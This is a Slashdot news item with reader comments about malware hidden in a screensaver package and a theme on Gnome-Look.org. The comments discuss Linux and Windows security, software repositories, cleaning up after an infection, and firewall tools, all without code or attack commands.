Malware Found Hidden In Screensaver On Gnome-Look 611
AndGodSed writes "OMG! UBUNTU! Reports the following: 'Malware has been found hidden inside an innocuous 'waterfall' screensaver .deb file made available on popular artwork sharing site Gnome-Look.org. The .deb file installs a script with elevated privileges designed to perform a DDoS attack as well as keep itself updated via downloads. The dodgy screensaver in question has since been removed from gnome-look, and this incident was a very basic, if potentially successful, attempt.'" A similar report at Digitizor.com says that similar malware was also found in a theme called Ninja Black. For those affected, both sites also provide instruction on cleansing your system.
Re:Not more safe (Score:5, Informative)
But this is not really about vulnerabilities. This is a screensaver that user downloads from a website. Open source or not, you can't fix that unless the whole system is totally locked down like iPhone. And that doesn't really sound good.
Re:Not more safe (Score:5, Informative)
But so what if it only gets access to one user? Malware doesn't really need root access. Stealing user data and sending spam is just as possible from user base. In history malware tried to just fuck over the computer which would had required root access, but now its just about sending spam or stealing data.
What the summary didn't mention... (Score:5, Informative)
see pro-linux.de [pro-linux.de] (german)
Re:Repositories! (Score:5, Informative)
No one is being locked into the repositories. If they want they can go elsewhere to get their software. The repositories merely provide a reasonably safe set of software available for the user.
Re:Not more safe (Score:3, Informative)
Wrong. They may have multiple user ACCOUNTS but most of them are only going to have one actual meat sack (i.e. USER) at the keyboard.
Re:At least it was fixable. (Score:1, Informative)
Often windows virus's use a vulnerability in the OS itself.
Re:Not more safe (Score:4, Informative)
Re:Not more safe (Score:3, Informative)
In this day and age, if your machine gets compromised by a virus, trojan, or rootkit, the only sensible thing to do is wipe and reinstall from a known clean backup. It doesn't matter what OS it is. There's no telling what other little friends they brought along that your chosen methods of detection didn't find. It's not really an option anymore to keep on going with a system that was compromised.
There's also been some evidence of malware that triggers AV software on purpose, and acts as a distraction while the real dirty payload gets delivered silently elsewhere in your system. You are now fooled into thinking your system is clean because your AV caught the distraction virus, completely missing the real one that was also installed.
Re:Not more safe (Score:3, Informative)
WIndows NT 3.5 existed at the same time as Windows 3.1 and had most of the same security features as Windows 7. The NX bit had not been implemented by Intel, so it couldn't support that, and the UAC stuff is not really needed for security. It's just a shortcut for getting admin privs without logging in as admin.
Really the recent changes in Windows security has been in guiding the user to more secure practices, such as not logging in as admin.
Re:At least it was fixable. (Score:5, Informative)
I'm afraid not. The reason this malware is easy to remove is because it doesn't do anything truly wretched, like patch libc and other applications, install a rootkit kernel module, and the like.
Having dealt with Linux boxes that have been hit by automatic exploitation tools that go well out of their way to hide their presence, I can tell you that no matter what the operating system, the standard advice holds: once the machine is infected, the only sure way to get it back to a known state is to restore from a backup made prior to the exploitation or to wipe it completely and start over. I should also point out that these machines were rooted through the exploitation of previously-patched vulnerabilities in setuid services -- which is the exact same vector many Windows worms use, including Slammer and Conficker.
The only difference between the tools I've run into and a full-on worm is that they run at the command of a cracker and scan IP address ranges of his choice. With a bare amount of automation, they could become very successful Linux worms, breaking into all those machines that, say, have old OpenSSH binaries that haven't been patched against its known remotely exploitable vulnerabilities.
Re:At least it was fixable. (Score:3, Informative)
Re:Spot the anachronism (Score:3, Informative)
X-screensavers includes one that is supposed to reverse the LCD equivalent of screen burn. I run it occasionally. It makes the screen flicker, and will probably hospitalise any epileptic who sees it.
Re:Not more safe (Score:3, Informative)
Disclaimer: I'm a tech at a work a computer repair shop.
Let me guess: she was running as root. This scareware deleted mbam.exe as soon as the installer unpacked it, and/or had a little icon by the clock that popped a notification balloon every time you started a process saying that it (even taskman) was infected with $SCARY_VIRUS_NAME and killed the process.
Since the middle of October, we've had a wave of clients with this stuff, many whom are running the best AV's (we sell NOD32) and have no idea how they got infected.
Different techs have different favorite ways of removing it, but my personal technique is to create another (limited) use account and start the MBAM installer from there with elevated permissions (using Run As). TADA!
I don't know why the scareware runs with your account permissions, but it sure makes it easy to defeat.
Re:Linux needs a "Zone Alarm" like program (Score:3, Informative)
Linux needs a program that performs the same function as Zone Alarm
It is called Netfilter [netfilter.org] and it is built into the kernel. For low-level configuration, take a look at the iptables command. Several hundred programs offer "simpler" configuration tools, from command line to GUI. Take a look at the L7-filter for application layer packet classification.